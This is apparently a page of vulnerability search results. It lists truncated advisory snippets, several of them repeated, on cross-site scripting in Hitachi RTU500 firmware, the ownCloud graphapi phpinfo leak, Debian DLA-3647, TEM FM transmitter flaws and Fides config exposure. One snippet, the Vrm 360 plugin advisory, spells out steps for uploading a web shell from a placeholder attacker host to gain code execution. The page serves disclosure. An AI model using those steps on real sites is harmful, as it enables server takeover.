CVE-2023-5767

A vulnerability exists in the webserver that affects the RTU500 series product versions listed below. A malicious actor could perform cross-site scripting on the webserver due to an RDT language file being improperly sanitized...

CVE-2023-5767

A vulnerability exists in the webserver that affects the RTU500 series product versions listed below. A malicious actor could perform cross-site scripting on the webserver due to an RDT language file being improperly sanitized...

Cross site scripting

A vulnerability exists in the webserver that affects the RTU500 series product versions listed below. A malicious actor could perform cross-site scripting on the webserver due to an RDT language file being improperly sanitized...

CVE-2023-5767

CVE-2023-5767 affects Hitachi Energy RTU500 series CMU firmware webserver. The vulnerability arises from improper sanitization of an RDT language file, enabling cross-site scripting on the webserver. Documented impact includes cross-site scripting risk with medium severity (CVSS ~6.0–6.1) and net...

CVE-2023-5767

A vulnerability exists in the webserver that affects the RTU500 series product versions listed below. A malicious actor could perform cross-site scripting on the webserver due to an RDT language file being improperly sanitized...

OwnCloud graphapi 0.2.x < 0.2.1 / 0.3.x < 0.3.1 Sensitive Informations Disclosure

An issue was discovered in OwnCloud graphapi plugin 0.2.x 0.2.1 and 0.3.x 0.3.1. The graphapi plugin relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment phpinfo. This information includes all th...

CVE-2023-4667 Stored Cross Site Scripting in webserver administration

The web interface of the PAC Device allows the device administrator user profile to store malicious scripts in some fields. The stored malicious script is then executed when the GUI is opened by any users of the webserver administration interface. The root cause of the vulnerability is inadequate...

Vrm 360 3D Model Viewer <= 1.2.1 - Contributor+ Arbitrary File Upload Leading to RCE

Description The plugin is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode. 1. Host a webserver with a shell named webshell.zip.php 2. As a contributor, add the shortcode: vrm360 canvasname=s1 modelurl=http://ATTACKERHOST/webshell.zip.php aspectratio=1.8...

CVE-2023-49103

An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment phpinfo. This information...

Debian dla-3647 : libtrapperkeeper-webserver-jetty9-clojure - security update

The remote Debian 10 host has a package installed that is affected by a vulnerability as referenced in the dla-3647 advisory. ------------------------------------------------------------------------- Debian LTS Advisory DLA-3647-1 [email protected] https://www.debian.org/lts/security/...

Debian: Security Advisory (DLA-3647-1)

The remote host is missing an update for the Debian SPDX-FileCopyrightText: 2023 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

DLA-3647-1 trapperkeeper-webserver-jetty9-clojure - security update

Bulletin has no description...

[SECURITY] [DLA 3647-1] trapperkeeper-webserver-jetty9-clojure

Debian LTS Advisory DLA-3647-1 [email protected] https://www.debian.org/lts/security/ Markus Koschany November 07, 2023 https://wiki.debian.org/LTS Package : trapperkeeper-webserver-jetty9-clojure Version : 1.7.0-2+deb10u2 Debian Bug : 1055348 The recent update of jetty9, released as DL...

TEM Opera Plus FM Family Transmitter 35.45 Remote Code Execution

TEM Opera Plus FM Family Transmitter 35.45 Remote Code Execution Vendor: Telecomunicazioni Elettro Milano TEM S.r.l. Product web page: https://www.tem-italy.it Affected version: Software version: 35.45 Webserver version: 1.7 Summary: This new line of Opera plus FM Transmitters combines very high...

TEM Opera Plus FM Family Transmitter 35.45 Cross Site Request Forgery Vulnerability

CSRF Change Forward Power: -------------------------...

TEM Opera Plus FM Family Transmitter 35.45 Remote Code Execution Vulnerability

TEM Opera Plus FM Family Transmitter 35.45 Remote Code Execution Vendor: Telecomunicazioni Elettro Milano TEM S.r.l. Product web page: https://www.tem-italy.it Affected version: Software version: 35.45 Webserver version: 1.7 Summary: This new line of Opera plus FM Transmitters combines very high...

CVE-2023-46125

Fides is an open-source privacy engineering platform for managing the fulfillment of data privacy requests in a runtime environment, and the enforcement of privacy regulations in code. The Fides webserver API allows users to retrieve its configuration using the GET api/v1/config endpoint. The...

Information disclosure

Fides is an open-source privacy engineering platform for managing the fulfillment of data privacy requests in a runtime environment, and the enforcement of privacy regulations in code. The Fides webserver API allows users to retrieve its configuration using the GET api/v1/config endpoint. The...

PT-2023-7928 · Unknown · Rtu500 Series

Name of the Vulnerable Software and Affected Versions: RTU500 series product versions affected versions not specified Description: A vulnerability exists in the webserver that affects the RTU500 series product, allowing a malicious actor to perform cross-site scripting due to an RDT language file...

TEM Opera Plus FM Family Transmitter 35.45 XSRF

Summary This new line of Opera plus FM Transmitters combines very high efficiency, high reliability and low energy consumption in compact solutions. They have innovative functions and features that can eliminate the costs required by additional equipment: automatic exchange of audio sources,...